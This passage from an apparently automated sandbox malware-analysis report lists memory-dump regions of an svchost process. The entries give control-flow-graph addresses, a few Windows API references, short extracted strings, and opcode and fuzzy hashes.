                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl
                                                    • API String ID: 0-682378881
                                                    • Opcode ID: 7267bad2baf4d69e934bb29fd5938e913818aa0299dfb6200443369b52c343b3
                                                    • Instruction ID: 09a695d8640e9f991486d63c75b975d6fbd30287ab18f983f0e4c54de58d2035
                                                    • Opcode Fuzzy Hash: 7267bad2baf4d69e934bb29fd5938e913818aa0299dfb6200443369b52c343b3
                                                    • Instruction Fuzzy Hash: D8B15FB1F1020A9FDF14CFA9C9867ADBBF2BF88304F148529D41DA7254EB749846CB81
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e4e243464614e95fa68850a1a7d8e79ab7c53e5357fb01c741078e5ccca8107
                                                    • Instruction ID: d607cdeadf164fa63ba6053e3f7eddb29c849c762bc69c9f29b10b1cae944463
                                                    • Opcode Fuzzy Hash: 6e4e243464614e95fa68850a1a7d8e79ab7c53e5357fb01c741078e5ccca8107
                                                    • Instruction Fuzzy Hash: 3FB160B0E1020AAFDF10CFA9C9867ADBBF6BF48354F148139D419A7254EB74A845CF81

                                                    Control-flow Graph

                                                    control_flow_graph 49 5c15311-5c15318 50 5c15388 49->50 51 5c1531a-5c1537f 49->51 53 5c15389-5c153b7 KiUserCallbackDispatcher 50->53 51->50 55 5c153c0-5c153e6 53->55 56 5c153b9-5c153bf 53->56 56->55
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 05C153A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID: 4']q
                                                    • API String ID: 2492992576-1259897404
                                                    • Opcode ID: 414cf536873775b5071714acb1807a55775e4bff24f50551233c7e19067ce0fc
                                                    • Instruction ID: db4a9ddc10341ef73d3085e8ccae4f61b7b2ed48c482b72783f517b228086b7a
                                                    • Opcode Fuzzy Hash: 414cf536873775b5071714acb1807a55775e4bff24f50551233c7e19067ce0fc
                                                    • Instruction Fuzzy Hash: 9E2178B1804249CFCB04DFA9E4456EEBFB8FB48310F14855AE819B3380C7786944CFA5

                                                    Control-flow Graph

                                                    control_flow_graph 61 5c15320-5c153b7 KiUserCallbackDispatcher 67 5c153c0-5c153e6 61->67 68 5c153b9-5c153bf 61->68 68->67
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00000050), ref: 05C153A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID: 4']q
                                                    • API String ID: 2492992576-1259897404
                                                    • Opcode ID: 2f8d138998caab1d10abc5de7eb34df332bf7ccd12b2b46589ff4babbf84f567
                                                    • Instruction ID: a20179545d746f64b9a3170a968355c0dc0028a2d1693cc536e91c7e11f55a38
                                                    • Opcode Fuzzy Hash: 2f8d138998caab1d10abc5de7eb34df332bf7ccd12b2b46589ff4babbf84f567
                                                    • Instruction Fuzzy Hash: 4B2138B59042498FCB04DFA9E4456EEBBB8FB48310F10855AD819B3380C7786944CFA5

                                                    Control-flow Graph
                                                    control_flow_graph 71 5236d88-5236d9e 72 5236da4-5236da6 71->72 73 5236edc-5236f01 71->73 74 5236f08-5236f53 72->74 75 5236dac-5236dba 72->75 73->74 99 5236fb5-5236fba 74->99 100 5236f55-5236f5e 74->100 80 5236ded-5236dfb 75->80 81 5236dbc-5236dc4 75->81 87 5236e42-5236e50 80->87 88 5236dfd-5236e05 80->88 82 5236dd2-5236dea 81->82 83 5236dc6-5236dc8 81->83 83->82 96 5236e52-5236e5a 87->96 97 5236e97-5236e9f 87->97 91 5236e13-5236e3f 88->91 92 5236e07-5236e09 88->92 92->91 103 5236e68-5236e94 96->103 104 5236e5c-5236e5e 96->104 101 5236ea1-5236ea3 97->101 102 5236ead-5236ed9 97->102 105 5236f60-5236f63 100->105 106 5236fab-5236faf 100->106 101->102 104->103 108 5236f65-5236f72 105->108 109 5236fbb-5237005 105->109 106->99 110 5236f82-5236f8a 108->110 111 5236f74-5236f80 108->111 117 5236f8f-5236f9f 110->117 111->110 122 5236fa0-5236fa9 111->122 122->105 122->106
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$(aq
                                                    • API String ID: 0-3916115647
                                                    • Opcode ID: 0078b768a2b2f643a92fdff52a894f3f513c43d7a1051ec713522e442901b759
                                                    • Instruction ID: 6d116ab72083d36c84bf14d12db49622136df6af9236bf08084a3582fc42d24a
                                                    • Opcode Fuzzy Hash: 0078b768a2b2f643a92fdff52a894f3f513c43d7a1051ec713522e442901b759
                                                    • Instruction Fuzzy Hash: 1471E4717182015FCB19DF6DD99096ABBEAEFC525071484BAD80ACB39ADE31EC06C790

                                                    Control-flow Graph
                                                    control_flow_graph 178 52360e4-523617c 181 52361c6-52361c8 178->181 182 523617e-5236189 178->182 183 52361ca-52361e2 181->183 182->181 184 523618b-5236197 182->184 190 52361e4-52361ef 183->190 191 523622c-523622e 183->191 185 52361ba-52361c4 184->185 186 5236199-52361a3 184->186 185->183 188 52361a7-52361b6 186->188 189 52361a5 186->189 188->188 192 52361b8 188->192 189->188 190->191 193 52361f1-52361fd 190->193 194 5236230-5236242 191->194 192->185 195 5236220-523622a 193->195 196 52361ff-5236209 193->196 201 5236249-5236275 194->201 195->194 197 523620b 196->197 198 523620d-523621c 196->198 197->198 198->198 200 523621e 198->200 200->195 202 523627b-5236289 201->202 203 5236292-52362a0 202->203 204 523628b-5236291 202->204 207 52362a8-52362b2 203->207 204->203 208 52362bc-52362ef 207->208 211 52362f1-52362f5 208->211 212 52362ff-5236303 208->212 211->212 215 52362f7-52362fa call 5230d6c 211->215 213 5236313-5236317 212->213 214 5236305-5236309 212->214 217 5236327-523632b 213->217 218 5236319-523631d 213->218 214->213 216 523630b-523630e call 5230d6c 214->216 215->212 216->213 222 523633b 217->222 223 523632d-5236331 217->223 218->217 221 523631f 218->221 221->217 225 523633c 222->225 223->222 224 5236333 223->224 224->222 225->225
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl$\Vl
                                                    • API String ID: 0-415357090
                                                    • Opcode ID: 1a26e75846343588d086465f2b3e0ce9213cdd80fbd9411eb1110afbc7edc342
                                                    • Instruction ID: 238055b68768764dcd5f33432012132ed7c594b0d45927a155931bab9b546335
                                                    • Opcode Fuzzy Hash: 1a26e75846343588d086465f2b3e0ce9213cdd80fbd9411eb1110afbc7edc342
                                                    • Instruction Fuzzy Hash: 06716EB0E10209EFDF14CFA8C9467DDBBF6BF88704F148129D419A7254D774A842CB91

                                                    Control-flow Graph
                                                    control_flow_graph 226 52360f0-523617c 229 52361c6-52361c8 226->229 230 523617e-5236189 226->230 231 52361ca-52361e2 229->231 230->229 232 523618b-5236197 230->232 238 52361e4-52361ef 231->238 239 523622c-523622e 231->239 233 52361ba-52361c4 232->233 234 5236199-52361a3 232->234 233->231 236 52361a7-52361b6 234->236 237 52361a5 234->237 236->236 240 52361b8 236->240 237->236 238->239 241 52361f1-52361fd 238->241 242 5236230-5236289 239->242 240->233 243 5236220-523622a 241->243 244 52361ff-5236209 241->244 251 5236292-52362b2 242->251 252 523628b-5236291 242->252 243->242 245 523620b 244->245 246 523620d-523621c 244->246 245->246 246->246 248 523621e 246->248 248->243 256 52362bc-52362ef 251->256 252->251 259 52362f1-52362f5 256->259 260 52362ff-5236303 256->260 259->260 263 52362f7-52362fa call 5230d6c 259->263 261 5236313-5236317 260->261 262 5236305-5236309 260->262 265 5236327-523632b 261->265 266 5236319-523631d 261->266 262->261 264 523630b-523630e call 5230d6c 262->264 263->260 264->261 270 523633b 265->270 271 523632d-5236331 265->271 266->265 269 523631f 266->269 269->265 273 523633c 270->273 271->270 272 5236333 271->272 272->270 273->273
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl$\Vl
                                                    • API String ID: 0-415357090
                                                    • Opcode ID: f5942880ce9d3ec0473e32f52293cb246f9c650b3e6237d6a7e638176db72965
                                                    • Instruction ID: 7d022f56b3cfecb47ecb611880ba065cc5f9ea3499e4b6a2603d9a9b79daec79
                                                    • Opcode Fuzzy Hash: f5942880ce9d3ec0473e32f52293cb246f9c650b3e6237d6a7e638176db72965
                                                    • Instruction Fuzzy Hash: A4716EB0E10209EFDF14CFA9C94679EBBF6BF88714F148129D419A7354DB74A842CB91

                                                    Control-flow Graph
                                                    control_flow_graph 274 5231748-5231777 275 5231a22-5231a5d 274->275 276 523177d-52317ef call 5230c30 274->276 286 5231a7b-5231a83 275->286 287 5231a5f-5231a76 275->287 305 52317f5-523186c 276->305 289 5231aae-5231ab7 286->289 287->286 290 5231a85-5231a8e 289->290 291 5231ab9-5231abf 289->291 292 5231ac2-5231ad4 290->292 293 5231a90-5231a9e 290->293 300 5231ad6-5231b1e call 5230c6c 292->300 301 5231b54-5231ba7 call 5231bc8 292->301 293->292 295 5231aa0-5231aa4 293->295 297 5231aa6-5231aa8 295->297 298 5231aab 295->298 297->298 298->289 316 5231b24-5231b4c 300->316 328 5231bad-5231bc5 301->328 332 5231883-52318a7 305->332 333 523186e-5231881 305->333 316->301 334 52318ae-52318b2 332->334 333->334 336 52318b4 334->336 337 52318bd 334->337 336->337 337->275
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$Te]q
                                                    • API String ID: 0-2961548996
                                                    • Opcode ID: 0035c18bf85cff71a72678e696f5b444c93ddc1d89567abd330470c9239846b2
                                                    • Instruction ID: 5b9232ea67dd97c53bbbeae01b2a6f4742417ffd0c98b9e78a8e1aa0c14f42ce
                                                    • Opcode Fuzzy Hash: 0035c18bf85cff71a72678e696f5b444c93ddc1d89567abd330470c9239846b2
                                                    • Instruction Fuzzy Hash: 92516C71B202149FC748DF69D459A9EBBF2BF88710F2180A9E806DB3A5DB74DC01CB90

                                                    Control-flow Graph
                                                    control_flow_graph 341 5237008-52370d8 call 5230e1c 354 52370da 341->354 355 52370dd-5237104 341->355 354->355 359 5237106 355->359 360 5237109-5237112 355->360 359->360 361 5237118-523718e call 5230c40 360->361 371 5237190 361->371 372 5237199 361->372 371->372
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$dLcq
                                                    • API String ID: 0-1133975778
                                                    • Opcode ID: bfe416bf44ac012eeb557eed465044ab12d7cdacd345682c041f8cecb8639c57
                                                    • Instruction ID: 970056daae648d258890d546ce967f004d487ae33b287d72cb0b2a769c394549
                                                    • Opcode Fuzzy Hash: bfe416bf44ac012eeb557eed465044ab12d7cdacd345682c041f8cecb8639c57
                                                    • Instruction Fuzzy Hash: 7C5104B5B601149FCB48DF69C898AADBBF6FF88B10F1540A9E406DB375DA71EC018B40

                                                    Control-flow Graph
                                                    control_flow_graph 373 52315b0-52315d0 374 52315d2-52315dc 373->374 375 52315de 373->375 377 52315e3-52315e5 374->377 375->377 378 52316d0-523170c 377->378 379 52315eb-5231634 377->379 390 523172b 378->390 391 523170f-523172a 378->391 388 5231640-5231687 379->388 389 5231636-523163a 379->389 400 523168d-52316b1 388->400 389->388 406 523172c call 52318c0 390->406 407 523172c call 5231748 390->407 391->390 392 5231732-5231742 403 52316b3 400->403 404 52316bc-52316bd 400->404 403->404 404->378 406->392 407->392
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Haq$dLcq
                                                    • API String ID: 0-1713614415
                                                    • Opcode ID: 4ea05757d74e6c86f207eb33340ff21cf9dbf2ee4792043325aa823d8863ebb7
                                                    • Instruction ID: e33808679b366b7850d1e86ec58f0ce6d07cfc939017c83c5817b94ae39418fb
                                                    • Opcode Fuzzy Hash: 4ea05757d74e6c86f207eb33340ff21cf9dbf2ee4792043325aa823d8863ebb7
                                                    • Instruction Fuzzy Hash: 1D41A071B042059FCB199F69D454AAEBBF6FF89200F1485AAE006DB3A1CA74DC05CB91

                                                    Control-flow Graph
                                                    control_flow_graph 408 5238950-5238977 410 5238981-52389af 408->410 411 5238979-5238980 408->411 415 52389b1-52389b8 call 52394ca 410->415 416 52389c6-52389d3 410->416 419 52389be-52389c4 415->419 417 52389d5-52389de 416->417 418 52389ff-5238a06 416->418 420 52389e0 417->420 421 5238a07-52394c0 417->421 419->415 419->416 571 52389e4 call 5238940 420->571 572 52389e4 call 5238950 420->572 573 52389e4 call 52389ec 420->573 422 52389ea-52389fd 422->417 422->418 571->422 572->422 573->422
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fbq
                                                    • API String ID: 0-3185938239
                                                    • Opcode ID: cf46295a9a177fa3d93f87b3d8276bc013b6b6a0239dfe263e6ec8b1cd9ba1d6
                                                    • Instruction ID: 007f1663a73640ef03c8870000c034a12f523caee9849f9955ca716ef1f99c31
                                                    • Opcode Fuzzy Hash: cf46295a9a177fa3d93f87b3d8276bc013b6b6a0239dfe263e6ec8b1cd9ba1d6
                                                    • Instruction Fuzzy Hash: 1252EE75A00309EFDB06ABB5E554B9D7B7BFF88300F104814E805237ADCB3A6856DB69

                                                    Control-flow Graph
                                                    control_flow_graph 574 523cb78-523cb99 575 523cba7-523cbab 574->575 576 523cb9b-523cb9f 574->576 577 523cbb1-523cbb4 575->577 578 523d20a 575->578 576->578 579 523cba5 576->579 580 523cbba-523cbc2 577->580 581 523d20f-523d214 577->581 578->581 579->577 582 523cbd2-523cbee call 523ca98 580->582 583 523cbc4-523cbc7 580->583 588 523d219-523d220 581->588 592 523cbf0-523cc06 call 523ca98 582->592 593 523cc6b-523cc97 call 523ca98 582->593 584 523cbcd 583->584 585 523cc9c-523ccc0 call 523ca98 583->585 584->588 596 523ccc2-523ccdb 585->596 597 523ccdd-523cceb 585->597 602 523cc38-523cc5d call 523ca98 592->602 603 523cc08-523cc0c 592->603 593->588 609 523cd15-523cd27 596->609 597->578 600 523ccf1-523ccf3 597->600 600->578 601 523ccf9-523ccfb 600->601 601->578 605 523cd01-523cd0d 601->605 624 523cc65-523cc69 602->624 603->602 606 523cc0e-523cc2e call 523ca98 603->606 605->609 626 523cc36 606->626 611 523cd39-523cd56 call 523ca98 609->611 612 523cd29 609->612 622 523cd58-523cd5c 611->622 623 523cd5e-523cd6d 611->623 612->588 617 523cd2f-523cd33 612->617 617->588 617->611 622->623 625 523cd70-523ce02 622->625 623->625 624->592 624->593 634 523ce05-523ce2d 625->634 626->624 634->581 637 523ce33-523ce51 634->637 638 523ce53 637->638 639 523ce5a-523ce63 637->639 640 523ceb5-523cec6 638->640 641 523ce55-523ce58 638->641 642 523ce65-523ce8b 639->642 643 523ce8d-523ceb3 639->643 644 523ced4-523ced8 640->644 645 523cec8-523cecc 640->645 641->639 641->640 651 523cef6-523ceff 642->651 643->651 644->578 649 523cede-523cee1 644->649 645->578 648 523ced2 645->648 648->649 649->581 650 523cee7-523ceef 649->650 650->651 651->581 652 523cf05-523cf1a 651->652 652->634 653 523cf20-523cf24 652->653 654 523cf26-523cf2a 653->654 655 523cf2c-523cf30 653->655 654->655 656 523cf40-523cf44 654->656 657 523d067-523d073 655->657 658 523cf36-523cf3a 655->658 659 523cf46-523cf4a 656->659 660 523cfa5-523cfa9 656->660 657->581 661 523d079-523d08a 657->661 
658->656 658->657 659->660 664 523cf4c-523cf58 659->664 662 523d007-523d00b 660->662 663 523cfab-523cfaf 660->663 661->581 665 523d090-523d097 661->665 662->657 666 523d00d-523d011 662->666 663->662 667 523cfb1-523cfbd 663->667 664->581 668 523cf5e-523cf79 664->668 665->581 669 523d09d-523d0a4 665->669 666->657 670 523d013-523d01f 666->670 667->581 671 523cfc3-523cfde 667->671 668->581 678 523cf7f-523cf87 668->678 669->581 672 523d0aa-523d0b1 669->672 670->581 673 523d025-523d040 670->673 671->581 681 523cfe4-523cfec 671->681 672->581 675 523d0b7-523d0ca call 523ca98 672->675 673->581 685 523d046-523d04e 673->685 683 523d12a-523d12e 675->683 684 523d0cc-523d0d0 675->684 678->581 682 523cf8d-523cfa0 678->682 681->581 686 523cff2-523d005 681->686 682->657 690 523d130-523d134 683->690 691 523d18b-523d18f 683->691 684->683 688 523d0d2-523d0de 684->688 685->581 689 523d054-523d05f 685->689 686->657 688->581 692 523d0e4-523d10c 688->692 689->657 690->691 696 523d136-523d142 690->696 693 523d1e2-523d1f7 691->693 694 523d191-523d195 691->694 692->581 708 523d112-523d125 692->708 698 523d1f9 693->698 699 523d208 693->699 694->693 701 523d197-523d1a3 694->701 696->581 702 523d148-523d170 696->702 698->611 703 523d1ff-523d202 698->703 699->588 701->581 705 523d1a5-523d1cd 701->705 702->581 709 523d176-523d189 702->709 703->611 703->699 705->581 712 523d1cf-523d1da 705->712 708->693 709->693 712->693
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d
                                                    • API String ID: 0-2564639436
                                                    • Opcode ID: f172d63b50a47dc203eeec7e0913c2e5c0926b8265613af76372ba1ccfce248d
                                                    • Instruction ID: 54a2433221988ff59aeb783014382535588f6597d7bb55ec6cdb7c42e7e83f3b
                                                    • Opcode Fuzzy Hash: f172d63b50a47dc203eeec7e0913c2e5c0926b8265613af76372ba1ccfce248d
                                                    • Instruction Fuzzy Hash: 203219B1A1060ADFDB14CF68C985BADFBF2FF44304F148629E419AB659D730E885CB84

                                                    Control-flow Graph
                                                    control_flow_graph 717 5c10b10-5c10b5b 721 5c10b62-5c10b75 LdrInitializeThunk 717->721 722 5c10b7c-5c10b83 721->722 723 5c10b85-5c10bb9 722->723 724 5c10bcb-5c10be4 722->724 723->724 733 5c10bbb-5c10bc5 723->733 726 5c10be6 724->726 727 5c10bef 724->727 726->727 729 5c10bf0 727->729 729->729 733->724
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b5ee4e3fecb081c916a3da18d62e4926813cfa97d32bfd62afe20933939652ec
                                                    • Instruction ID: b7ea717f120d5d87598710107d8a368e60ec3b65626e0ecec2a579096ec57270
                                                    • Opcode Fuzzy Hash: b5ee4e3fecb081c916a3da18d62e4926813cfa97d32bfd62afe20933939652ec
                                                    • Instruction Fuzzy Hash: 90215E317111049FC715EB34C56979E37F2AF89748F200978D406A7398DF759D42CB91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl
                                                    • API String ID: 0-682378881
                                                    • Opcode ID: 9df892debe66a86804fd2ebf0c1226e2ad7c7c3d70e530e3cd70f0076f49b0bb
                                                    • Instruction ID: afa1de3234c59527ec981e78e9ed4bc04923c029c51ef62f023b8c899239736d
                                                    • Opcode Fuzzy Hash: 9df892debe66a86804fd2ebf0c1226e2ad7c7c3d70e530e3cd70f0076f49b0bb
                                                    • Instruction Fuzzy Hash: F5B14EB1F2020A9FDB10CFA9C98679DBBF2BF88304F148529D41DA7254EB749846CB91
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C10A89
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 2e53271970940094a9946c7f38338974f38eff8e3bfde9167a3b2f0124957c21
                                                    • Instruction ID: 4c5e2156cc1ca6157589d3cad2c62aed5ccbea811f21f7f4b046ec22c5071873
                                                    • Opcode Fuzzy Hash: 2e53271970940094a9946c7f38338974f38eff8e3bfde9167a3b2f0124957c21
                                                    • Instruction Fuzzy Hash: 7BE06D36905425DFCB25DB98E558AACF731FB84312F018521D85673608C73069D2DBC9
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05C10A89
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4530992819.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5c10000_svchost.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: f9741311e36349e8379bf802e9f4eff8fed4b010c0794fb1c66a90e9f05ec78b
                                                    • Instruction ID: e76a7b71c7251c9e256ae41083dd14867668060d34d8cb9d7861c4478841001b
                                                    • Opcode Fuzzy Hash: f9741311e36349e8379bf802e9f4eff8fed4b010c0794fb1c66a90e9f05ec78b
                                                    • Instruction Fuzzy Hash: D8E04F36905924DFCB18DB84E9586ACB771FB80312F008535C85663544C73069D2CFC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C
                                                    • API String ID: 0-1104475367
                                                    • Opcode ID: 68de998e7a4fa0413ba28dcdb98b24ff56de5dad7898122b3665b6cddd0875bb
                                                    • Instruction ID: 6b75ca373c8767cb4cb22352a5395c0ce594772801e186d72946da91f84f6736
                                                    • Opcode Fuzzy Hash: 68de998e7a4fa0413ba28dcdb98b24ff56de5dad7898122b3665b6cddd0875bb
                                                    • Instruction Fuzzy Hash: 3D41B075E2160A8FCB18DFA9C59199EBBB3FF84304F208529D406AF355DB70E946CB81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C
                                                    • API String ID: 0-1104475367
                                                    • Opcode ID: 164d1e06e2d1f885bc360cfad47c14b742c56945cdd7512465a684d2e5ea72dc
                                                    • Instruction ID: dd06d22684a706081a355f66129379e0653a40754d1b506e4eeac904a7c1c3ae
                                                    • Opcode Fuzzy Hash: 164d1e06e2d1f885bc360cfad47c14b742c56945cdd7512465a684d2e5ea72dc
                                                    • Instruction Fuzzy Hash: 8A41C071A1570A8FCB19DFA8C5909AEBBB3BF84304B208529D40AAF355DB70E806CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C
                                                    • API String ID: 0-1104475367
                                                    • Opcode ID: 38afd847856d8fc4b99fad8cfd1481176888c95611b1a16f2e6a02247388bbd8
                                                    • Instruction ID: 128bd7ff4f967a64e9fbdb174e038ab293f3b2aec34fa5f8df70ec48a9662717
                                                    • Opcode Fuzzy Hash: 38afd847856d8fc4b99fad8cfd1481176888c95611b1a16f2e6a02247388bbd8
                                                    • Instruction Fuzzy Hash: F241D571A1570A8FCB19DFA8D5909AEBBB3FF85304B208529D40AAF354DB70ED06CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: dLcq
                                                    • API String ID: 0-2236789282
                                                    • Opcode ID: 3374c3603ebbc1da6070d15fa084151241bcd6fab76c0df2b8b750957b8a559a
                                                    • Instruction ID: 521a991c52c863fb21a688a0c48fc63a9a2e3a8a324898a705b8e66a69bea77c
                                                    • Opcode Fuzzy Hash: 3374c3603ebbc1da6070d15fa084151241bcd6fab76c0df2b8b750957b8a559a
                                                    • Instruction Fuzzy Hash: 1B3180B1A102059FDB159F69C449BAEBBF1FF48300F148569E406AB3A1CB75DC45CF91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LR]q
                                                    • API String ID: 0-3081347316
                                                    • Opcode ID: 38299ebffcd998c1356bd87987b46ff9661d083ab12d378145765803ce98fcd8
                                                    • Instruction ID: 2812b26a96089a8b8156820cc477986d99542d252a2258b2c13f6fe16b1d2ee3
                                                    • Opcode Fuzzy Hash: 38299ebffcd998c1356bd87987b46ff9661d083ab12d378145765803ce98fcd8
                                                    • Instruction Fuzzy Hash: B131E071F102169FCB44EBB88451A6E7BF2BF89210B14456DD44ADB3A5EE34DC02CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x$[
                                                    • API String ID: 0-2834467104
                                                    • Opcode ID: 07f696069b08d216c38ecab83bf81b930517c4dbcf0315b25ef84b5c32c813c8
                                                    • Instruction ID: d4572fabfa80f2622e32f8359341cd256588a05334becfae0ced6b792518144f
                                                    • Opcode Fuzzy Hash: 07f696069b08d216c38ecab83bf81b930517c4dbcf0315b25ef84b5c32c813c8
                                                    • Instruction Fuzzy Hash: 240184B1B003008FEB089F54E88579A7BE6FF98701F148479E9089F395DB759946C760
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4509716252.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_5230000_svchost.jbxd
                                                    Similarity
